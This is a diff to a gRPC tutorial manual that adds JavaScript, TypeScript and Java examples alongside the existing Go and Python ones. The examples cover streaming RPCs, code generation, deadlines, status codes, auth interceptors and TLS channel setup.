+        private int count = 0;
+
+        @Override public void onNext(Event ev) {
+            store(ev);
+            count++;
+        }
+
+        @Override public void onError(Throwable t) {
+            // client vanished mid-upload; nothing to reply to
+        }
+
+        @Override public void onCompleted() { // client finished sending
+            responseObserver.onNext(
+                UploadSummary.newBuilder().setReceived(count).build());
+            responseObserver.onCompleted(); // single reply, then close
+        }
+    };
+}
+
+// ===== CLIENT: the ASYNC stub; a blocking stub cannot send a stream =====
+UserServiceStub client = UserServiceGrpc.newStub(channel);
+CountDownLatch done = new CountDownLatch(1);
+
+StreamObserver<Event> requests = client.uploadEvents(new StreamObserver<UploadSummary>() {
+    @Override public void onNext(UploadSummary s) {
+        System.out.println("server received " + s.getReceived() + " events");
+    }
+    @Override public void onError(Throwable t) { done.countDown(); }
+    @Override public void onCompleted() { done.countDown(); }
+});
+
+for (Event ev : events) {
+    requests.onNext(ev); // push each one up
+}
+requests.onCompleted(); // close our side, await the summary
+
+done.await(30, TimeUnit.SECONDS);
+```
+
 The asymmetry is the point: `SendAndClose`/`CloseAndRecv` in Go, a `request_iterator` plus a normal `return` in Python, the server consumes the whole request stream _before_ producing its one answer.
 
 ## Bidirectional Streaming
@@ -430,7 +789,7 @@ The asymmetry is the point: `SendAndClose`/`CloseAndRecv` in Go, a `request_iter
 
 ______
 
-● Go● Python
+● Go● Python● JavaScript● TypeScript● Java
 
 ```go
 // proto:  rpc Chat(stream ChatMessage) returns (stream ChatMessage);
@@ -485,6 +844,103 @@ def chat(stub):
 # (for true concurrency under load, prefer the async API: grpc.aio)
 ```
 
+```js
+// proto:  rpc Chat(stream ChatMessage) returns (stream ChatMessage);
+
+// ===== SERVER: `call` is duplex, read and write on the same object =====
+function chat(call) {
+  call.on('data', (msg) => {
+    // echo back (or broadcast to a room, etc.), can write anytime, any number
+    call.write({ user: 'server', text: 'ack: ' + msg.text })
+  })
+  call.on('end', () => call.end()) // client closed its send side
+}
+
+// ===== CLIENT: one duplex stream; write and listen independently =====
+function chatClient(client) {
+  const call = client.chat()
+
+  call.on('data', (msg) => console.log('<<', msg.text)) // concurrent receiver
+
+  for (const text of ['hi', 'how are you', 'bye']) {
+    call.write({ user: 'ada', text })
+  }
+  call.end() // signal we're done sending; 'data' keeps firing for the rest
+}
+```
+
+```ts
+// proto:  rpc Chat(stream ChatMessage) returns (stream ChatMessage);
+
+// ===== SERVER: a typed duplex stream =====
+const userService: UserServiceServer = {
+  chat(call: ServerDuplexStream<ChatMessage, ChatMessage>): void {
+    call.on('data', (msg: ChatMessage) => {
+      call.write({ user: 'server', text: 'ack: ' + msg.text })
+    })
+    call.on('end', () => call.end())
+  },
+}
+
+// ===== CLIENT: no second thread needed =====
+// Compare this with the Go tab, which spawns a goroutine to receive while
+// the main function sends. Node needs no such thing: writes go out
+// immediately and 'data' fires on the event loop, so one thread is
+// already doing both directions. The trade is that nothing ever blocks,
+// so there is no natural place where back-pressure makes itself felt,
+// you have to watch `call.write()`'s return value for that.
+function chat(client: UserServiceClient): void {
+  const call = client.chat()
+
+  call.on('data', (msg: ChatMessage) => console.log('<<', msg.text))
+
+  for (const text of ['hi', 'how are you', 'bye']) {
+    call.write({ user: 'ada', text })
+  }
+  call.end() // signal we're done sending; the receiver drains the rest
+}
+```
+
+```java
+// proto:  rpc Chat(stream ChatMessage) returns (stream ChatMessage);
+
+// ===== SERVER: read from the returned observer, write to the parameter =====
+@Override
+public StreamObserver<ChatMessage> chat(StreamObserver<ChatMessage> responseObserver) {
+    return new StreamObserver<ChatMessage>() {
+        @Override public void onNext(ChatMessage msg) {
+            // interleaved: reply as each message arrives, any number of times
+            responseObserver.onNext(ChatMessage.newBuilder()
+                .setUser("server")
+                .setText("ack: " + msg.getText())
+                .build());
+        }
+
+        @Override public void onError(Throwable t) { }
+
+        @Override public void onCompleted() {
+            responseObserver.onCompleted(); // client closed its send side
+        }
+    };
+}
+
+// ===== CLIENT: the async stub; both directions live at once =====
+UserServiceStub client = UserServiceGrpc.newStub(channel);
+
+StreamObserver<ChatMessage> outgoing = client.chat(new StreamObserver<ChatMessage>() {
+    @Override public void onNext(ChatMessage in) {
+        System.out.println("<< " + in.getText()); // concurrent receiver
+    }
+    @Override public void onError(Throwable t) { }
+    @Override public void onCompleted() { }
+});
+
+for (String t : List.of("hi", "how are you", "bye")) {
+    outgoing.onNext(ChatMessage.newBuilder().setUser("ada").setText(t).build());
+}
+outgoing.onCompleted(); // signal we're done sending; the receiver drains the rest
+```
+
 Streaming gotchas to respect
 
 Streams are long-lived, so they consume a connection/goroutine for their lifetime, always set deadlines or idle limits, and handle the client vanishing mid-stream. There's no automatic back-pressure knob beyond HTTP/2 flow control, so a fast producer can overwhelm a slow consumer if you don't pace it. And a single stream is ordered but _not_ a transaction, if it breaks halfway, you've delivered a prefix, so design messages to be resumable or idempotent.
@@ -500,14 +956,14 @@ Part IV / The Machinery
 You never write the stubs and skeletons by hand, a compiler, `protoc` (or the buf toolchain), reads your `.proto` and emits idiomatic source for each target language via a language-specific **plugin**. This is the step that turns the contract into callable code, and it's the reason a Go client and a Python server can interoperate flawlessly: both were generated from the same file.
 
 <Diagram caption="Code generation">
-<svg viewBox="0 0 720 240" xmlns="http://www.w3.org/2000/svg" role="img" aria-label="A proto file fed into protoc with language plugins, producing Go and Python generated code that both client and server import"><rect x="40" y="95" width="150" height="56" rx="10" fill="var(--dg-accent)"></rect><text x="115" y="120" font-size="13" font-weight="700" fill="var(--dg-on-accent)" text-anchor="middle">user.proto</text><text x="115" y="138" class="mono" font-size="9.5" fill="var(--dg-on-accent)" text-anchor="middle">the contract</text><defs><marker id="ga" markerWidth="9" markerHeight="9" refX="7" refY="3" orient="auto"><path d="M0 0 L7 3 L0 6 Z" fill="var(--dg-ink-2)"></path></marker></defs><path d="M192 123 H262" stroke="var(--dg-ink-2)" stroke-width="1.8" marker-end="url(#ga)"></path><rect x="264" y="92" width="150" height="62" rx="10" fill="var(--dg-inverse)"></rect><text x="339" y="116" font-size="12.5" font-weight="700" fill="var(--dg-on-inverse)" text-anchor="middle">protoc</text><text x="339" y="133" class="mono" font-size="9" fill="var(--dg-on-inverse)" text-anchor="middle">+ lang plugins</text><text x="339" y="146" class="mono" font-size="9" fill="var(--dg-on-inverse)" text-anchor="middle">(protoc-gen-go, grpc&#95;tools)</text><path d="M416 110 C460 90 480 70 520 64" stroke="var(--dg-ok)" stroke-width="1.8" fill="none" marker-end="url(#ga)"></path><path d="M416 138 C460 158 480 178 520 184" stroke="var(--dg-ok)" stroke-width="1.8" fill="none" marker-end="url(#ga)"></path><rect x="522" y="36" width="178" height="56" rx="10" fill="var(--dg-ok-surface)" stroke="var(--dg-ok)"></rect><text x="611" y="58" font-size="12" font-weight="700" fill="var(--dg-ok)" text-anchor="middle">Go: &#42;.pb.go</text><text x="611" y="76" class="mono" font-size="9" fill="var(--dg-ink-2)" text-anchor="middle">messages + stub + server base</text><rect x="522" y="156" width="178" height="56" rx="10" fill="var(--dg-ok-surface)" stroke="var(--dg-ok)"></rect><text x="611" y="178" font-size="12" font-weight="700" fill="var(--dg-ok)" text-anchor="middle">Py: &#42;&#95;pb2&#42;.py</text><text x="611" y="196" class="mono" font-size="9" fill="var(--dg-ink-2)" text-anchor="middle">messages + stub + servicer</text><text x="360" y="228" class="serif" font-size="12.5" font-style="italic" fill="var(--dg-ink-2)" text-anchor="middle">Regenerate after every proto change, the generated files are build artifacts, committed or generated in CI.</text></svg>
+<svg viewBox="0 0 720 240" xmlns="http://www.w3.org/2000/svg" role="img" aria-label="A proto file fed into protoc with language plugins, producing generated code per target language that both client and server import"><rect x="40" y="95" width="150" height="56" rx="10" fill="var(--dg-accent)"></rect><text x="115" y="120" font-size="13" font-weight="700" fill="var(--dg-on-accent)" text-anchor="middle">user.proto</text><text x="115" y="138" class="mono" font-size="9.5" fill="var(--dg-on-accent)" text-anchor="middle">the contract</text><defs><marker id="ga" markerWidth="9" markerHeight="9" refX="7" refY="3" orient="auto"><path d="M0 0 L7 3 L0 6 Z" fill="var(--dg-ink-2)"></path></marker></defs><path d="M192 123 H262" stroke="var(--dg-ink-2)" stroke-width="1.8" marker-end="url(#ga)"></path><rect x="264" y="92" width="150" height="62" rx="10" fill="var(--dg-inverse)"></rect><text x="339" y="116" font-size="12.5" font-weight="700" fill="var(--dg-on-inverse)" text-anchor="middle">protoc</text><text x="339" y="133" class="mono" font-size="9" fill="var(--dg-on-inverse)" text-anchor="middle">+ lang plugins</text><text x="339" y="146" class="mono" font-size="9" fill="var(--dg-on-inverse)" text-anchor="middle">(one per target language)</text><path d="M416 110 C460 90 480 70 520 64" stroke="var(--dg-ok)" stroke-width="1.8" fill="none" marker-end="url(#ga)"></path><path d="M416 138 C460 158 480 178 520 184" stroke="var(--dg-ok)" stroke-width="1.8" fill="none" marker-end="url(#ga)"></path><rect x="522" y="36" width="178" height="56" rx="10" fill="var(--dg-ok-surface)" stroke="var(--dg-ok)"></rect><text x="611" y="58" font-size="12" font-weight="700" fill="var(--dg-ok)" text-anchor="middle">Go: &#42;.pb.go</text><text x="611" y="76" class="mono" font-size="9" fill="var(--dg-ink-2)" text-anchor="middle">messages + stub + server base</text><rect x="522" y="156" width="178" height="56" rx="10" fill="var(--dg-ok-surface)" stroke="var(--dg-ok)"></rect><text x="611" y="178" font-size="12" font-weight="700" fill="var(--dg-ok)" text-anchor="middle">Py: &#42;&#95;pb2&#42;.py</text><text x="611" y="196" class="mono" font-size="9" fill="var(--dg-ink-2)" text-anchor="middle">messages + stub + servicer</text><text x="360" y="228" class="serif" font-size="12.5" font-style="italic" fill="var(--dg-ink-2)" text-anchor="middle">Regenerate after every proto change, the generated files are build artifacts, committed or generated in CI.</text></svg>
 </Diagram>
 
 ______
 
-● Go● Python
+● Go● Python● JavaScript● TypeScript● Java
 
-```text
+```go
 // Install the two plugins once (they sit on your PATH):
 //   go install google.golang.org/protobuf/cmd/protoc-gen-go@latest
 //   go install google.golang.org/grpc/cmd/protoc-gen-go-grpc@latest
@@ -526,7 +982,7 @@ ______
 //   import userv1 "example.com/gen/userv1"
 ```
 
-```text
+```python
 # Install the tooling once:
 #   pip install grpcio grpcio-tools
 
@@ -544,6 +1000,70 @@ ______
 # Then import both in your code:
 #   import user_pb2 as pb
 #   import user_pb2_grpc as pb_grpc
+```
+
+```js
+// Node does NOT generate source by default. Install the runtime pair:
+//   npm install @grpc/grpc-js @grpc/proto-loader
+
+// There is no build step: proto-loader reads user.proto at STARTUP and
+// builds the client and server constructors in memory.
+//   const def = protoLoader.loadSync('user.proto')
+//   const { user } = grpc.loadPackageDefinition(def)
+
+// Produces: nothing on disk. The service is discovered at runtime as
+//   user.v1.UserService  (client constructor)
+//   user.v1.UserService.service  (the descriptor you addService() with)
+
+// The trade is real and worth stating: no generated files to review, and
+// no check at all that your handler object matches the contract. A typo
+// in a method name is simply an unimplemented RPC at runtime.
+```
+
+```ts
+// For TypeScript you DO want generated source, so that the contract is a
+// compile-time thing again. Install protoc plus a TS plugin:
+//   npm install -D ts-proto
+//   npm install @grpc/grpc-js
+
+// Generate typed messages AND grpc-js service definitions:
+//   protoc \
+//     --plugin=./node_modules/.bin/protoc-gen-ts_proto \
+//     --ts_proto_out=./src/gen \
+//     --ts_proto_opt=outputServices=grpc-js,esModuleInterop=true \
+//     user.proto
+
+// Produces:
+//   src/gen/user.ts, interfaces for each message, a real TS enum for Role,
+//                    UserServiceClient (stub) + UserServiceServer (to implement)
+
+// Then import it like any other module:
+//   import { UserServiceClient, type UserServiceServer } from './gen/user'
+```
+
+```java
+// Java generates at BUILD time, wired into the build tool rather than run
+// by hand. With Gradle and the protobuf plugin:
+//
+//   plugins { id 'com.google.protobuf' version '0.9.4' }
+//
+//   protobuf {
+//     protoc { artifact = 'com.google.protobuf:protoc:3.25.3' }
+//     plugins {
+//       grpc { artifact = 'io.grpc:protoc-gen-grpc-java:1.62.2' }
+//     }
+//     generateProtoTasks { all()*.plugins { grpc {} } }
+//   }
+//
+// Drop user.proto in src/main/proto/ and `./gradlew build` regenerates it.
+
+// Produces (in build/generated/source/proto/main):
+//   User.java, GetUserRequest.java, ... immutable classes + Builders
+//   UserServiceGrpc.java, UserServiceImplBase (to extend)
+//                       + newBlockingStub / newStub / newFutureStub
+
+// Then import the generated package:
+//   import com.example.gen.userv1.UserServiceGrpc;
 ```
 
 <Callout type="info" title="Use buf in real projects">
@@ -572,7 +1092,7 @@ A gRPC deadline is an _absolute_ point in time, not a per-hop duration. When ser
 
 ______
 
-● Go● Python
+● Go● Python● JavaScript● TypeScript● Java
 
 ```go
 // ===== CLIENT: attach a deadline + metadata =====
@@ -625,6 +1145,124 @@ class UserService(pb_grpc.UserServiceServicer):
         return self.lookup(request.id)
 ```
 
+```js
+// ===== CLIENT: attach a deadline + metadata =====
+const metadata = new grpc.Metadata()
+metadata.set('authorization', `Bearer ${token}`) // auth as metadata, sec 16
+metadata.set('x-request-id', reqId)              // trace id for correlation
+
+// A deadline in grpc-js is an ABSOLUTE Date, not a duration. That is the
+// right shape: as the call is retried or forwarded, everyone downstream
+// inherits the same wall-clock instant rather than a fresh N seconds.
+const deadline = new Date(Date.now() + 1000)
+
+client.getUser({ id: 'u42' }, metadata, { deadline }, (err, resp) => {
+  if (err?.code === grpc.status.DEADLINE_EXCEEDED) {
+    console.log('call timed out') // a network-shaped failure a local call never had
+  }
+})
+
+// ===== SERVER: read metadata, notice cancellation =====
+function getUser(call, callback) {
+  const auth = call.metadata.get('authorization')[0] // verify here or in an interceptor, sec 15
+
+  if (call.cancelled) {
+    return // client gone / deadline passed; abandon the work
+  }
+  call.on('cancelled', () => abortWork()) // fires if they hang up mid-call
+  lookup(call.request.id).then((u) => callback(null, u))
+}
+```
+
+```ts
+// ===== CLIENT: a wrapper, so no call site can forget the deadline =====
+// This is the point worth making in TypeScript: a deadline you must
+// remember to pass is a deadline somebody will eventually omit. Make the
+// parameter required and the omission stops compiling.
+function callWithDeadline<Req, Res>(
+  method: (req: Req, md: grpc.Metadata, opts: grpc.CallOptions,
+           cb: (e: grpc.ServiceError | null, r: Res) => void) => void,
+  req: Req,
+  timeoutMs: number, // required, not optional
+): Promise<Res> {
+  const md = new grpc.Metadata()
+  md.set('authorization', `Bearer ${token}`) // auth as metadata, sec 16
+  md.set('x-request-id', reqId)              // trace id for correlation
+
+  return new Promise((resolve, reject) => {
+    const deadline = new Date(Date.now() + timeoutMs) // absolute deadline
+    method(req, md, { deadline }, (err, res) => {
+      if (err?.code === grpc.status.DEADLINE_EXCEEDED) {
+        reject(new Error('call timed out'))
+      } else if (err) {
+        reject(err)
+      } else {
+        resolve(res)
+      }
+    })
+  })
+}
+
+// ===== SERVER: read metadata, respect cancellation =====
+const userService: UserServiceServer = {
+  getUser(call, callback): void {
+    const auth = call.metadata.get('authorization')[0]
+
+    // An AbortSignal is how the cancellation is threaded onward, the
+    // Node equivalent of passing Go's ctx down to the DB driver.
+    const ac = new AbortController()
+    call.on('cancelled', () => ac.abort())
+
+    lookup(call.request.id, ac.signal).then(
+      (user) => callback(null, { user }),
+      (err) => callback(err),
+    )
+  },
+}
+```
+
+```java
+// ===== CLIENT: attach a deadline + metadata =====
+Metadata headers = new Metadata();
+Metadata.Key<String> AUTH =
+    Metadata.Key.of("authorization", Metadata.ASCII_STRING_MARSHALLER);
+Metadata.Key<String> REQ_ID =
+    Metadata.Key.of("x-request-id", Metadata.ASCII_STRING_MARSHALLER);
+headers.put(AUTH, "Bearer " + token);  // auth travels as metadata, sec 16
+headers.put(REQ_ID, reqId);            // trace id for correlation
+
+UserServiceBlockingStub stub = UserServiceGrpc.newBlockingStub(channel)
+    .withDeadlineAfter(1, TimeUnit.SECONDS) // absolute deadline for the call
+    .withInterceptors(MetadataUtils.newAttachHeadersInterceptor(headers));
+
+try {
+    GetUserResponse resp = stub.getUser(GetUserRequest.newBuilder().setId("u42").build());
+} catch (StatusRuntimeException e) {
+    if (e.getStatus().getCode() == Status.Code.DEADLINE_EXCEEDED) {
+        System.out.println("call timed out"); // a network-shaped failure
+    }
+}
+
+// ===== SERVER: read metadata, respect the inherited deadline =====
+// Headers are read in an interceptor (sec 15) and handed to the method
+// through a Context key, which is Java's context: a per-call, immutable
+// key-value scope that also carries the deadline and cancellation.
+@Override
+public void getUser(GetUserRequest req, StreamObserver<GetUserResponse> responseObserver) {
+    String auth = AUTH_CONTEXT_KEY.get(); // put there by the auth interceptor
+
+    Context ctx = Context.current();
+    if (ctx.isCancelled()) { // client gone / deadline passed?
+        responseObserver.onError(Status.CANCELLED.asRuntimeException());
+        return; // abandon the work
+    }
+    // Pass ctx down so slow work is abandoned automatically:
+    //   ctx.call(() -> db.lookup(req.getId()));
+    responseObserver.onNext(lookup(req.getId()));
+    responseObserver.onCompleted();
+}
+```
+
 Pass the context down, always
 
 In Go, thread the incoming `ctx` into _every_ downstream call (DB queries, outbound RPCs). That's what makes deadlines and cancellation actually work, if the client hangs up, the cancellation ripples all the way down and frees everything. A handler that ignores `ctx` keeps grinding on abandoned work.
@@ -650,7 +1288,7 @@ gRPC does not use HTTP status codes. It has its own fixed set of **status codes*
 
 ______
 
-● Go● Python
+● Go● Python● JavaScript● TypeScript● Java
 
 ```go
 import (
@@ -707,6 +1345,120 @@ except grpc.RpcError as e:
         print("unexpected:", e.code(), e.details())
 ```
 
+```js
+const grpc = require('@grpc/grpc-js')
+
+// SERVER: pass a status object to the callback, not a bare Error.
+function getUser(call, callback) {
+  if (!call.request.id) {
+    return callback({ code: grpc.status.INVALID_ARGUMENT, message: 'id is required' })
+  }
+  const user = db.find(call.request.id)
+  if (!user) {
+    return callback({
+      code: grpc.status.NOT_FOUND,
+      message: `no user with id "${call.request.id}"`,
+    })
+  }
+  callback(null, { user })
+}
+
+// Throwing a plain Error instead reaches the client as UNKNOWN with the
+// message swallowed, which is the single most common grpc-js mistake.
+
+// CLIENT: inspect err.code to decide what to do.
+client.getUser(req, (err, resp) => {
+  if (err) {
+    switch (err.code) {
+      case grpc.status.NOT_FOUND:    break // expected, show "not found" in UI
+      case grpc.status.UNAVAILABLE:  break // transient, retry with backoff, sec 17
+      default: console.error('unexpected:', err.code, err.details)
+    }
+  }
+})
+```
+
+```ts
+import * as grpc from '@grpc/grpc-js'
+
+// A narrow, named union of the codes this service actually returns is
+// worth the four lines: `switch` then gets exhaustiveness checking, so
+// adding a code to the server without handling it on the client fails
+// the build instead of falling through to the default branch in prod.
+type UserServiceCode =
+  | grpc.status.NOT_FOUND
+  | grpc.status.INVALID_ARGUMENT
+  | grpc.status.UNAVAILABLE
+
+// SERVER: a helper, so every error in the service has the same shape.
+function fail(code: grpc.status, message: string): grpc.ServiceError {
+  return Object.assign(new Error(message), { code, details: message }) as grpc.ServiceError
+}
+
+const userService: UserServiceServer = {
+  getUser(call, callback): void {
+    if (!call.request.id) {
+      callback(fail(grpc.status.INVALID_ARGUMENT, 'id is required'))
+      return
+    }
+    const user = db.find(call.request.id)
+    if (!user) {
+      callback(fail(grpc.status.NOT_FOUND, `no user with id "${call.request.id}"`))
+      return
+    }
+    callback(null, { user })
+  },
+}
+
+// CLIENT: switch on the typed code.
+function handle(err: grpc.ServiceError): void {
+  switch (err.code as UserServiceCode) {
+    case grpc.status.NOT_FOUND:       break // expected, show "not found"
+    case grpc.status.UNAVAILABLE:     break // transient, retry with backoff, sec 17
+    case grpc.status.INVALID_ARGUMENT: break // our bug, fix the call site
+  }
+}
+```
+
+```java
+// SERVER: fail the observer with a typed Status, never a bare exception.
+@Override
+public void getUser(GetUserRequest req, StreamObserver<GetUserResponse> responseObserver) {
+    if (req.getId().isEmpty()) {
+        responseObserver.onError(Status.INVALID_ARGUMENT
+            .withDescription("id is required")
+            .asRuntimeException());
+        return;
+    }
+
+    Optional<User> user = db.find(req.getId());
+    if (user.isEmpty()) {
+        responseObserver.onError(Status.NOT_FOUND
+            .withDescription("no user with id \"" + req.getId() + "\"")
+            .asRuntimeException());
+        return;
+    }
+
+    responseObserver.onNext(GetUserResponse.newBuilder().setUser(user.get()).build());
+    responseObserver.onCompleted();
+}
+
+// Any OTHER exception escaping the method becomes UNKNOWN with no
+// description at all, which tells the client nothing. Catch and map.
+
+// CLIENT: catch StatusRuntimeException and switch on the code.
+try {
+    GetUserResponse resp = client.getUser(req);
+} catch (StatusRuntimeException e) {
+    switch (e.getStatus().getCode()) {
+        case NOT_FOUND   -> { }  // expected, show "not found" in UI
+        case UNAVAILABLE -> { }  // transient, retry with backoff, sec 17
+        default -> System.err.printf("unexpected: %s: %s%n",
+            e.getStatus().getCode(), e.getStatus().getDescription());
+    }
+}
+```
+
 <Callout type="info" title="Rich, structured errors">
 When a code + message isn't enough (e.g. per-field validation details, like the REST error envelope), gRPC supports **error details**: typed protobuf messages attached to the status (the `google.rpc` types: `BadRequest`, `QuotaFailure`, `RetryInfo`...). The client deserializes them as structured data, never by parsing a human string, same principle as the machine-readable `code` field in the REST manual's error envelope.
 </Callout>
@@ -721,7 +1473,7 @@ If you read the handlers/services/middleware chapter, this is the exact same ide
 
 ______
 
-● Go● Python
+● Go● Python● JavaScript● TypeScript● Java
 
 ```go
 // A unary server interceptor: signature is fixed by the framework.
@@ -776,6 +1528,133 @@ server = grpc.server(
 #   channel = grpc.intercept_channel(base_channel, MyClientInterceptor())
 ```
 
+```js
+// grpc-js has no first-class server interceptor API, so the usual shape
+// is a wrapper applied to each handler when the service is registered.
+// Same idea as chapter 06's middleware: wrap, don't call from inside.
+function withAuth(handler) {
+  return (call, callback) => {
+    const token = call.metadata.get('authorization')[0]
+    if (!token || !valid(token)) {
+      // short-circuit: the real handler never runs
+      return callback({
+        code: grpc.status.UNAUTHENTICATED,
+        message: 'missing or invalid token',
+      })
+    }
+    call.user = parse(token) // attach the verified identity for the handler
+    return handler(call, callback)
+  }
+}
+
+function withLogging(handler, name) {
+  return (call, callback) => {
+    const start = Date.now()
+    handler(call, (err, resp) => {
+      console.log(`${name} took ${Date.now() - start}ms -> ${err ? err.code : 'OK'}`)
+      callback(err, resp)
+    })
+  }
+}
+
+// Register the chain when building the service (outermost listed first):
+server.addService(user.v1.UserService.service, {
+  getUser: withLogging(withAuth(getUser), 'GetUser'),
+})
+```
+
+```ts
+// Typing the wrapper is what keeps a chain honest: `withAuth` returns the
+// same handler type it took, so wrappers compose in any order and a
+// wrapper that forgets to call the handler fails to type-check.
+type Handler<Req, Res> = (
+  call: grpc.ServerUnaryCall<Req, Res>,
+  callback: grpc.sendUnaryData<Res>,
+) => void
+
+function withAuth<Req, Res>(handler: Handler<Req, Res>): Handler<Req, Res> {
+  return (call, callback) => {
+    const token = call.metadata.get('authorization')[0]
+    if (typeof token !== 'string' || !valid(token)) {
+      callback({
+        code: grpc.status.UNAUTHENTICATED,
+        message: 'missing or invalid token',
+      } as grpc.ServiceError)
+      return // short-circuit before the handler ever runs
+    }
+    return handler(call, callback) // call the next link / the real handler
+  }
+}
+
+function withLogging<Req, Res>(name: string, handler: Handler<Req, Res>): Handler<Req, Res> {
+  return (call, callback) => {
+    const start = Date.now()
+    handler(call, (err, resp) => {
+      console.log(`${name} took ${Date.now() - start}ms -> ${err?.code ?? 'OK'}`)
+      callback(err, resp)
+    })
+  }
+}
+
+// Outermost listed first, exactly as in the Go tab:
+server.addService(UserServiceService, {
+  getUser: withLogging('GetUser', withAuth(getUser)),
+})
+```
+
+```java
+// A ServerInterceptor is the real thing in Java, and its shape is fixed
+// by the framework, like Go's.
+public class AuthInterceptor implements ServerInterceptor {
+    static final Context.Key<User> USER = Context.key("user");
+    static final Metadata.Key<String> AUTH =
+        Metadata.Key.of("authorization", Metadata.ASCII_STRING_MARSHALLER);
+
+    @Override
+    public <ReqT, RespT> ServerCall.Listener<ReqT> interceptCall(
+            ServerCall<ReqT, RespT> call, Metadata headers,
+            ServerCallHandler<ReqT, RespT> next) {
+
+        String token = headers.get(AUTH);
+        if (token == null || !valid(token)) {
+            call.close(Status.UNAUTHENTICATED
+                .withDescription("missing or invalid token"), new Metadata());
+            // short-circuit: a no-op listener, the handler never runs
+            return new ServerCall.Listener<>() { };
+        }
+
+        // Attach the verified identity for the handler to read from Context
+        Context ctx = Context.current().withValue(USER, parse(token));
+        return Contexts.interceptCall(ctx, call, headers, next);
+    }
+}
+
+public class LoggingInterceptor implements ServerInterceptor {
+    @Override
+    public <ReqT, RespT> ServerCall.Listener<ReqT> interceptCall(
+            ServerCall<ReqT, RespT> call, Metadata headers,
+            ServerCallHandler<ReqT, RespT> next) {
+        long start = System.nanoTime();
+        return next.startCall(new SimpleForwardingServerCall<>(call) {
+            @Override public void close(Status status, Metadata trailers) {
+                System.out.printf("%s took %dms -> %s%n",
+                    call.getMethodDescriptor().getFullMethodName(),
+                    (System.nanoTime() - start) / 1_000_000, status.getCode());
+                super.close(status, trailers);
+            }
+        }, headers);
+    }
+}
+
+// Register the chain when building the server. Note the ordering trap:
+// interceptors run in REVERSE registration order, so the one listed last
+// is the outermost. Spelling the chain out in one call keeps it visible.
+Server server = ServerBuilder.forPort(50051)
+    .addService(ServerInterceptors.intercept(new UserServiceImpl(),
+        new AuthInterceptor(), new LoggingInterceptor())) // logging outermost
+    .build();
+```
+
 This is the gRPC home for everything the layers manual put in middleware: auth, logging, tracing, rate limiting, panic recovery, written once, applied to every method.
 
 Part V / Production & Interop
@@ -792,7 +1671,7 @@ gRPC security splits into two orthogonal questions: **channel security** (is the
 
 ______
 
-● Go● Python
+● Go● Python● JavaScript● TypeScript● Java
 
 ```go
 import "google.golang.org/grpc/credentials"
@@ -838,6 +1717,115 @@ class TokenAuth(grpc.AuthMetadataPlugin):
 call_creds = grpc.metadata_call_credentials(TokenAuth(token))
 composite  = grpc.composite_channel_credentials(channel_creds, call_creds)
 channel    = grpc.secure_channel("api.example.com:443", composite)
+```
+
+```js
+const fs = require('node:fs')
+const grpc = require('@grpc/grpc-js')
+
+// ===== SERVER over TLS =====
+const serverCreds = grpc.ServerCredentials.createSsl(
+  null, // no client CA -> TLS, not mTLS
+  [{
+    private_key: fs.readFileSync('server.key'),
+    cert_chain: fs.readFileSync('server.crt'),
+  }],
+)
+server.bindAsync('0.0.0.0:443', serverCreds, () => {}) // every connection encrypted
+
+// ===== CLIENT over TLS =====
+const channelCreds = grpc.credentials.createSsl(fs.readFileSync('ca.crt')) // trust this CA
+
+// ===== Per-call token, composed with the channel credentials =====
+const callCreds = grpc.credentials.createFromMetadataGenerator((_params, cb) => {
+  const md = new grpc.Metadata()
+  md.set('authorization', `Bearer ${token}`) // a fresh token on every call
+  cb(null, md)
+})
+
+const combined = grpc.credentials.combineChannelCredentials(channelCreds, callCreds)
+const client = new user.v1.UserService('api.example.com:443', combined)
+
+// grpc-js refuses to attach call credentials to an insecure channel, the
+// same guard as Go's RequireTransportSecurity() returning true.
+```
+
+```ts
+import * as fs from 'node:fs'
+import * as grpc from '@grpc/grpc-js'
+
+// ===== SERVER over TLS =====
+const serverCreds = grpc.ServerCredentials.createSsl(
+  null,
+  [{
+    private_key: fs.readFileSync('server.key'),
+    cert_chain: fs.readFileSync('server.crt'),
+  }],
+  false, // checkClientCertificate: flip to true (with a CA above) for mTLS
+)
+
+// ===== CLIENT over TLS + a per-call token =====
+// The generator runs per call rather than once, and that is the point:
+// a token read once at startup is a token that expires in production at
+// 3am. Fetch it here, from a cache that refreshes it.
+function tokenCredentials(getToken: () => Promise<string>): grpc.CallCredentials {
+  return grpc.credentials.createFromMetadataGenerator((_params, cb) => {
+    getToken().then(
+      (token) => {
+        const md = new grpc.Metadata()
+        md.set('authorization', `Bearer ${token}`)
+        cb(null, md)
+      },
+      (err) => cb(err),
+    )
+  })
+}
+
+const channelCreds = grpc.credentials.createSsl(fs.readFileSync('ca.crt'))
+const client = new UserServiceClient(
+  'api.example.com:443',
+  grpc.credentials.combineChannelCredentials(channelCreds, tokenCredentials(getToken)),
+)
+```
+
+```java
+// ===== SERVER over TLS =====
+Server server = NettyServerBuilder.forPort(443)
+    .useTransportSecurity(new File("server.crt"), new File("server.key"))
+    .addService(new UserServiceImpl())
+    .build();  // every connection is now encrypted
+
+// For mTLS, demand a client cert signed by a CA you trust:
+//   .sslContext(GrpcSslContexts.forServer(crt, key)
+//       .trustManager(new File("ca.crt"))
+//       .clientAuth(ClientAuth.REQUIRE)
+//       .build())
+
+// ===== CLIENT over TLS =====
+ManagedChannel channel = NettyChannelBuilder.forAddress("api.example.com", 443)
+    .sslContext(GrpcSslContexts.forClient()
+        .trustManager(new File("ca.crt")) // trust this CA
+        .build())
+    .build();
+
+// ===== Per-call token (combine with TLS) =====
+// CallCredentials is applied per call, so a refreshed token is picked up
+// without rebuilding the channel.
+CallCredentials bearer = new CallCredentials() {
+    @Override
+    public void applyRequestMetadata(RequestInfo info, Executor exec, MetadataApplier applier) {
+        exec.execute(() -> {
+            Metadata md = new Metadata();
+            md.put(Metadata.Key.of("authorization", Metadata.ASCII_STRING_MARSHALLER),
+                   "Bearer " + tokenSupplier.get());
+            applier.apply(md);
+        });
+    }
+    @Override public void thisUsesUnstableApi() { }
+};
+
+UserServiceBlockingStub stub = UserServiceGrpc.newBlockingStub(channel)
+    .withCallCredentials(bearer); // refuses to travel over a plaintext channel
 ```
 
 Never send tokens over plaintext
@@ -976,6 +1964,6 @@ The whole manual compressed to what you reach for under pressure.
 
